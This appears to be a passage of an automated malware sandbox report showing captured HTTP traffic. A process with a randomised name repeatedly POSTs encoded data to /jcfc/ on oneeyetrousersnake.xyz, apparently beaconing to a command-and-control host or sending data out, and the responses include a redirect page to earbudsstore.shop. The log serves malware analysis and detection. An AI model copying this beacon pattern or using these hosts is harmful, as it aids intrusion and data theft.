                                                                                      Data Ascii: 522<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/t846?gp=1&js=1&uuid=1736535285.9772559917&other_args=eyJ1cmkiOiAiL3Q4NDYiLCAiYXJncyI6ICJiYmc9NGZYRGlkeDJPL1FaZnRoM0dMSlV2clB6dGF2SWp0c0hNOUFjY2d3TzdXc2YrNHl5S2JWc05VcTluM2JhT3RiWGdFN1BnUyt0MEthdVZEOHA5TE5OUGxUbUpMdzFrL1Y5dlJIV1p4a1E2VEh6bkNxZjBWeEZWRTVtUmk1Z3lWOXdDZz09JjRIcGg9dFhDWGtwS1BUIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:45.742032051 CET241INData Raw: 73 61 57 31 68 5a 32 55 76 59 58 42 75 5a 79 77 71 4c 79 6f 37 63 54 30 77 4c 6a 67 73 59 58 42 77 62 47 6c 6a 59 58 52 70 62 32 34 76 63 32 6c 6e 62 6d 56 6b 4c 57 56 34 59 32 68 68 62 6d 64 6c 4f 33 59 39 59 6a 4d 37 63 54 30 77 4c 6a 63 69 4c
                                                                                      Data Ascii: saW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjciLCAidXJpX2MiOiAiNjkwNiIsICJhcmdzX2MiOiAiOGQzYyIsICJyZWZlcmVyX2MiOiAiZjViZSIsICJhY2NlcHRfYyI6ICI0Y2ZjIn0="; } </script> </body></html>
                                                                                      Jan 10, 2025 19:54:45.742054939 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.55004663.250.43.134804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:50.806430101 CET807OUTPOST /jcfc/ HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.oneeyetrousersnake.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.oneeyetrousersnake.xyz/jcfc/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 35 77 73 44 32 42 45 77 6e 6e 45 6b 74 63 30 4b 62 56 44 64 62 2f 42 36 43 4a 39 56 34 6a 47 35 59 5a 54 59 7a 44 6c 67 62 64 55 34 61 4e 62 71 36 6e 44 46 6d 79 67 76 75 76 63 7a 2b 49 6c 7a 54 74 66 65 39 67 6c 76 41 34 52 4f 73 79 4c 42 61 46 36 2f 75 72 42 4e 74 62 6f 45 32 4d 77 64 50 43 41 6f 4f 37 52 79 45 6d 78 37 6b 72 4a 31 6f 49 6f 2b 5a 7a 4a 4f 71 66 63 2b 31 62 68 43 71 52 71 50 46 6b 62 50 44 43 77 72 55 44 63 70 62 46 50 6d 31 6b 4a 75 6c 6a 76 39 51 67 43 68 59 63 36 4a 31 2b 61 63 41 44 52 4e 2f 73 73 62 48 7a 69 58 31 2b 70 52 43 6f 6d 36 7a 39 4a 64 65 42 74 45 36 43 51 3d
                                                                                      Data Ascii: bbg=5wsD2BEwnnEktc0KbVDdb/B6CJ9V4jG5YZTYzDlgbdU4aNbq6nDFmygvuvcz+IlzTtfe9glvA4ROsyLBaF6/urBNtboE2MwdPCAoO7RyEmx7krJ1oIo+ZzJOqfc+1bhCqRqPFkbPDCwrUDcpbFPm1kJuljv9QgChYc6J1+acADRN/ssbHziX1+pRCom6z9JdeBtE6CQ=
                                                                                      Jan 10, 2025 19:54:51.454307079 CET1236INHTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:51 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Raw: 31 37 41 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 [TRUNCATED]
                                                                                      Data Ascii: 17A2<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:51.454327106 CET224INData Raw: 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73
                                                                                      Data Ascii: biJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4
                                                                                      Jan 10, 2025 19:54:51.454336882 CET1236INData Raw: 69 45 30 32 50 79 78 41 53 33 39 4e 5a 63 5a 39 6f 43 44 4b 35 34 2f 41 7a 6e 37 44 2b 35 41 68 66 62 54 70 79 49 6d 79 36 75 74 67 41 45 67 4d 6c 6d 72 79 35 51 6f 66 31 4e 4f 52 6b 4a 49 4a 67 6f 4f 51 46 4d 4f 52 6b 4a 73 43 69 38 65 43 2f 32
                                                                                      Data Ascii: iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv2ANNb129McFJn4WRAASjWOj10lgNeGKCi37y1MNYgFjTxpN4pv6xGax/vYgDcTGNaCwAAeK9/UumwH71y5eD0YsRO/nwrq2f4/wme1sR612xVVtuzgdvcgRU726rrf73M
                                                                                      Jan 10, 2025 19:54:51.454349041 CET1236INData Raw: 4b 2b 59 47 79 64 6d 30 2b 6d 6a 59 63 43 6b 77 4c 77 59 46 44 72 32 53 4a 75 77 58 57 45 6d 52 6e 54 35 44 78 76 41 5a 4a 66 61 73 76 45 36 39 34 6d 70 55 6d 4b 58 64 5a 47 68 46 70 53 39 61 35 4a 61 36 34 4b 2f 58 41 44 5a 6a 35 66 69 56 73 51
                                                                                      Data Ascii: K+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxHdC8VEm1VzJ5FIsgffR0
                                                                                      Jan 10, 2025 19:54:51.454360962 CET448INData Raw: 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66
                                                                                      Data Ascii: 66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6
                                                                                      Jan 10, 2025 19:54:51.454371929 CET1236INData Raw: 62 4f 6d 50 64 4d 73 42 45 79 34 61 51 73 41 37 4a 49 64 41 53 62 63 54 41 52 49 5a 4c 6b 41 70 64 43 73 7a 55 31 66 41 4d 56 36 53 79 46 54 52 77 34 47 33 50 51 46 59 4b 7a 50 45 62 77 30 47 72 57 35 61 51 75 41 48 5a 63 32 53 4c 47 30 4d 65 47
                                                                                      Data Ascii: bOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv
                                                                                      Jan 10, 2025 19:54:51.454405069 CET1236INData Raw: 78 78 5a 76 72 6e 48 6a 55 64 4f 41 64 77 36 32 32 30 7a 50 39 74 57 50 33 59 75 63 52 52 74 61 62 65 56 33 53 65 74 7a 74 6d 2b 57 4e 4f 57 42 6d 6f 4c 74 32 2f 74 42 4f 6c 62 30 75 7a 5a 54 32 52 5a 65 57 44 2b 6d 65 57 62 61 50 4f 57 39 2b 47
                                                                                      Data Ascii: xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZ
                                                                                      Jan 10, 2025 19:54:51.454415083 CET448INData Raw: 35 45 4c 68 57 61 54 44 76 6c 6f 6c 52 44 2f 61 5a 63 51 2f 32 61 50 44 71 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 49 4d 41 48 57 47 4a 43 44 39 6a 6a 51 76 43 5a 35 4d 52 2f 32 65 54 45 66 39 6a 6a 51 70 49 59 6f 77
                                                                                      Data Ascii: 5ELhWaTDvlolRD/aZcQ/2aPDqAAAAAAAAAAAAAAAAAAAAAAYIMAHWGJCD9jjQvCZ5MR/2eTEf9jjQpIYowDQ2WSDv1nlBH/Y44Mxl6NA0FmiAAeAAAAAAAAAAAAAAAAAAAAAFyLCxZfkQUzYo4FW2WQDvNolRD/ZJAPqmOQDKZolRD/ZJEM9WCQCl9kkQUzVYoKGAAAAAAAAAAAAAAAAGOSDmdmkg7nZ5MR/2SQDvFijgz7ZJAP
                                                                                      Jan 10, 2025 19:54:51.454426050 CET1236INData Raw: 59 6b 47 4a 57 57 51 44 73 35 6b 6a 51 4e 52 53 47 30 41 42 31 32 54 41 42 4d 41 41 41 41 41 41 41 41 41 41 57 53 51 44 4b 70 6e 6b 78 48 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 65 54 45 66 39 6a 6b 41 75 77 66 33 38
                                                                                      Data Ascii: YkGJWWQDs5kjQNRSG0AB12TABMAAAAAAAAAAWSQDKpnkxH/ZI8Q/2SPEP9kjxD/ZI8Q/2eTEf9jkAuwf38AAgAAAABjjQASP38fCAAAAAAAAAAAAAAAAF2OBDRkkA73ZJAP/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZZEO+WKKDTkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABijg90aJUQ/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZI8Q
                                                                                      Jan 10, 2025 19:54:51.454435110 CET224INData Raw: 2f 39 2b 78 54 47 53 34 4c 67 63 31 53 56 74 61 47 42 54 59 51 4a 31 54 39 42 2f 4b 7a 4d 79 68 30 56 4b 45 35 6b 47 34 4b 45 69 69 4f 73 59 4a 30 55 6d 39 43 5a 74 31 4b 53 32 74 57 38 30 56 70 6e 75 5a 35 52 30 50 47 48 49 6d 42 35 79 70 30 6f
                                                                                      Data Ascii: /9+xTGS4Lgc1SVtaGBTYQJ1T9B/KzMyh0VKE5kG4KEiiOsYJ0Um9CZt1KS2tW80VpnuZ5R0PGHImB5yp0ozcWbuffN/KUk2k4G7JxZkwOJ21c1ZW342NzUgTc/WCiMMwT0L3CR/SP6FDeyKKmayGG3mf1kjckYgV6l9cu0eqPPUQaZN3HBtfRQ5lFC/2XcSuD/woHqgGX6gqVVq1MXPqjVdyX5G9MMu0
                                                                                      Jan 10, 2025 19:54:51.459412098 CET1236INData Raw: 42 44 54 45 6b 38 51 6e 54 53 48 75 38 30 66 70 46 4d 4d 37 78 75 6c 79 58 50 69 35 55 68 74 52 52 51 7a 47 4f 72 67 30 63 64 6d 6b 72 50 61 58 71 53 36 64 7a 33 71 48 79 75 76 31 43 35 56 52 36 6a 7a 41 70 61 75 59 4d 66 77 39 45 55 55 53 32 6b
                                                                                      Data Ascii: BDTEk8QnTSHu80fpFMM7xulyXPi5UhtRRQzGOrg0cdmkrPaXqS6dz3qHyuv1C5VR6jzApauYMfw9EUUS2k/LdHwD9mAf+FZcQuU/slhoN/xvxGBQudlmKhWbkQR/9d1OloYBg+YDW++fXPt4kkNoZqoayDKgjFsPRrKyjitPvvzTsx/Pb5+Z90UdolhT92SSyGJeydBILKr6/Ynf5nt394lPiJSIiAErLGRRZq+SGVHLCtbR8Hj


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.55004763.250.43.134804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:53.359026909 CET827OUTPOST /jcfc/ HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.oneeyetrousersnake.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.oneeyetrousersnake.xyz/jcfc/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 35 77 73 44 32 42 45 77 6e 6e 45 6b 74 39 45 4b 64 32 37 64 4d 50 42 39 48 4a 39 56 7a 44 47 44 59 5a 66 59 7a 43 68 4b 63 72 45 34 61 73 4c 71 37 6c 6e 46 7a 79 67 76 6b 50 63 32 68 59 6c 73 54 73 6a 73 39 67 70 76 41 34 46 4f 73 33 76 42 61 55 36 38 76 37 42 31 67 37 6f 38 70 63 77 64 50 43 41 6f 4f 37 56 4c 45 6d 35 37 6e 62 35 31 75 70 6f 39 55 54 4a 52 74 66 63 2b 2f 4c 68 4f 71 52 72 67 46 6e 65 71 44 42 59 72 55 43 73 70 63 55 50 70 2f 6b 4a 53 34 7a 75 32 56 41 58 7a 59 4d 7a 42 76 59 62 4e 66 77 4a 6f 7a 36 64 78 64 52 71 2f 6d 65 46 70 53 37 75 4e 69 4e 6f 30 45 69 39 30 6b 56 45 51 4e 2f 50 6e 5a 4a 75 78 75 4b 51 4b 4a 64 68 47 54 41 6c 75
                                                                                      Data Ascii: bbg=5wsD2BEwnnEkt9EKd27dMPB9HJ9VzDGDYZfYzChKcrE4asLq7lnFzygvkPc2hYlsTsjs9gpvA4FOs3vBaU68v7B1g7o8pcwdPCAoO7VLEm57nb51upo9UTJRtfc+/LhOqRrgFneqDBYrUCspcUPp/kJS4zu2VAXzYMzBvYbNfwJoz6dxdRq/meFpS7uNiNo0Ei90kVEQN/PnZJuxuKQKJdhGTAlu
                                                                                      Jan 10, 2025 19:54:53.942375898 CET1236INHTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:53 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Raw: 32 45 34 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 [TRUNCATED]
                                                                                      Data Ascii: 2E42<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:53.942390919 CET224INData Raw: 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73
                                                                                      Data Ascii: biJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4
                                                                                      Jan 10, 2025 19:54:53.942400932 CET1236INData Raw: 69 45 30 32 50 79 78 41 53 33 39 4e 5a 63 5a 39 6f 43 44 4b 35 34 2f 41 7a 6e 37 44 2b 35 41 68 66 62 54 70 79 49 6d 79 36 75 74 67 41 45 67 4d 6c 6d 72 79 35 51 6f 66 31 4e 4f 52 6b 4a 49 4a 67 6f 4f 51 46 4d 4f 52 6b 4a 73 43 69 38 65 43 2f 32
                                                                                      Data Ascii: iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv2ANNb129McFJn4WRAASjWOj10lgNeGKCi37y1MNYgFjTxpN4pv6xGax/vYgDcTGNaCwAAeK9/UumwH71y5eD0YsRO/nwrq2f4/wme1sR612xVVtuzgdvcgRU726rrf73M
                                                                                      Jan 10, 2025 19:54:53.942411900 CET224INData Raw: 4b 2b 59 47 79 64 6d 30 2b 6d 6a 59 63 43 6b 77 4c 77 59 46 44 72 32 53 4a 75 77 58 57 45 6d 52 6e 54 35 44 78 76 41 5a 4a 66 61 73 76 45 36 39 34 6d 70 55 6d 4b 58 64 5a 47 68 46 70 53 39 61 35 4a 61 36 34 4b 2f 58 41 44 5a 6a 35 66 69 56 73 51
                                                                                      Data Ascii: K+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxH
                                                                                      Jan 10, 2025 19:54:53.942502022 CET1236INData Raw: 64 43 38 56 45 6d 31 56 7a 4a 35 46 49 73 67 66 66 52 30 75 4d 55 31 4b 31 4e 42 41 4b 4e 49 79 73 33 37 58 62 79 71 64 79 39 62 61 56 4d 4a 44 71 63 62 47 35 74 79 53 56 5a 73 5a 63 46 44 33 54 69 57 58 32 50 35 4b 71 43 53 2f 6c 6e 57 61 59 36
                                                                                      Data Ascii: dC8VEm1VzJ5FIsgffR0uMU1K1NBAKNIys37Xbyqdy9baVMJDqcbG5tySVZsZcFD3TiWX2P5KqCS/lnWaY6Y8u2/OLa181I//Q42NP3LXzq3Py82/g7sVWb73XzD+9qeRvi3uPmo2E7UTN39l/c/vnS9f4509N/A8B8Sp4dDZbzB3ORT/nQfsKPo+5M/4Drl+2uAmCHNc8PFrhPu8tF4Nbh5c2ncsUjH/KlPrl8PdmVdM3BVQAY9
                                                                                      Jan 10, 2025 19:54:53.942513943 CET1236INData Raw: 4c 62 6b 4b 57 4d 49 54 78 79 49 53 39 45 46 4f 48 55 36 75 68 36 67 64 61 62 41 50 76 61 72 53 33 45 78 43 6d 6c 30 43 39 42 79 31 78 76 72 50 6f 37 4e 7a 51 56 47 71 44 35 33 77 71 62 70 31 7a 6e 68 43 2b 74 2f 62 46 67 33 71 68 76 61 36 42 62
                                                                                      Data Ascii: LbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9By1xvrPo7NzQVGqD53wqbp1znhC+t/bFg3qhva6BbojXb/vVSSp4SJC3HSTZ78jQQA5F9NwArbx4yTtgBXfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JId
                                                                                      Jan 10, 2025 19:54:53.942524910 CET448INData Raw: 6e 4b 69 33 4f 7a 4a 55 32 35 70 49 38 43 65 62 4b 52 6a 47 37 37 78 54 7a 7a 4b 46 4c 38 54 73 33 37 41 62 6e 4f 73 59 31 31 46 73 48 37 4d 79 4c 4d 64 37 63 36 4e 4a 31 4c 4e 64 63 37 6d 71 61 30 59 77 6e 30 59 6f 62 4f 63 39 79 32 5a 2f 6e 68
                                                                                      Data Ascii: nKi3OzJU25pI8CebKRjG77xTzzKFL8Ts37AbnOsY11FsH7MyLMd7c6NJ1LNdc7mqa0Ywn0YobOc9y2Z/nh8z9UHnAeejTZucry9swpghar8rGUuj7MGKdktkKse699sEKjGY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOAdw6220z
                                                                                      Jan 10, 2025 19:54:53.942539930 CET1236INData Raw: 56 77 52 72 58 30 44 35 2b 49 46 69 34 42 56 4f 72 56 5a 4e 71 65 53 4d 41 6d 62 4f 44 6a 5a 76 62 59 5a 54 34 4b 31 37 53 39 56 6a 37 4c 68 74 7a 48 72 72 2f 59 4b 6c 76 54 6a 2f 4e 6a 47 78 75 59 46 54 33 49 75 37 66 30 6f 6b 61 63 37 57 6f 39
                                                                                      Data Ascii: VwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxHdC8VEm1VzJ5FIsgffR0uMU1K1NBAKNIys37Xbyqdy9baVMJDqcbG5tySVZsZcFD3TiWX2P5KqCS/lnWaY6Y8u2/OLa181I//Q42NP3LXzq3Py82/g7
